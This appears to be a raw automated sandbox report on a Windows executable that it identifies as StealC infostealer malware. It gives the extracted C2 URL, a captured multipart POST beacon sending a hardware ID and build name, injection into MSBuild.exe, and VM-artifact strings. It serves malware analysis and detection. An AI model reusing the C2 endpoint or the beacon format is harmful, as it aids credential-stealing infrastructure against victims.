Source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack |
Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"} |
Source: Aew8SXjXEb.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Malware configuration extractor |
URLs: http://62.204.41.150/edd20096ecef326d.php |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF-- |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 52.182.143.211 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 62.204.41.150 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 23.206.229.226 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_00406280 InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile, |
1_2_00406280 |
Source: unknown |
HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 46 35 45 32 34 46 39 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="hwid"EFF5E24F91144293944220------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="build"default6_doz------EHDAAECAEBKJKFHJKECF-- |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150 |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/ |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/J |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/L |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/S |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/Y |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php0 |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5 |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php; |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpi |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpoca. |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpu |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpx& |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150/z |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150E |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150G |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://62.204.41.150ig |
Source: Amcache.hve.6.dr |
String found in binary or memory: http://upx.sf.net |
Source: unknown |
Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49742 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49672 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49676 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49742 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00622021 |
0_2_00622021 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0062729C |
0_2_0062729C |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0063D39B |
0_2_0063D39B |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0063572C |
0_2_0063572C |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0067094F |
0_2_0067094F |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0062CAF2 |
0_2_0062CAF2 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0063BB36 |
0_2_0063BB36 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00633C92 |
0_2_00633C92 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00621D79 |
0_2_00621D79 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_0062FEF0 |
0_2_0062FEF0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: String function: 004045C0 appears 317 times |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: String function: 00627B80 appears 49 times |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272 |
Source: Aew8SXjXEb.exe, 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe |
Source: Aew8SXjXEb.exe |
Binary or memory string: OriginalFilenameproquota.exej% vs Aew8SXjXEb.exe |
Source: classification engine |
Classification label: mal100.troj.evad.winEXE@4/5@0/1 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6032 |
Source: Aew8SXjXEb.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: unknown |
Process created: C:\Users\user\Desktop\Aew8SXjXEb.exe "C:\Users\user\Desktop\Aew8SXjXEb.exe" |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 272 |
|
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: rstrtmgr.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: Aew8SXjXEb.exe |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: Aew8SXjXEb.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: Aew8SXjXEb.exe |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, |
1_2_0041C03D |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_006271AD push ecx; ret |
0_2_006271C0 |
Source: C:\Users\user\Desktop\Aew8SXjXEb.exe |
Code function: 0_2_00667F0D push ecx; ret |
0_2_00667F20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Code function: 1_2_0041B035 push ecx; ret |
1_2_0041B048 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware Virtual USB Mouse |
Source: Amcache.hve.6.dr |
Binary or memory string: vmci.syshbin |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67 |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware, Inc. |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.6.dr |
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.6.dr |
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.6.dr |
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.6.dr |
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.6.dr |
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.6.dr |
Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.6.dr |
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.6.dr |
Binary or memory string: vmci.sys |
Source: Amcache.hve.6.dr |
Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.6.dr |
Binary or memory string: \driver\vmci,\driver\pci |
Source: Amcache.hve.6.dr |
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware20,1 |
Source: Amcache.hve.6.dr |
Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.6.dr |
Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMwareVMware |
Source: Amcache.hve.6.dr |
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.6.dr |
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.6.dr |
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware PCI VMCI Bus Device |
Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMwareVMwareP |
Source: Amcache.hve.6.dr |
Binary or memory string: VMware VMCI Bus Device |
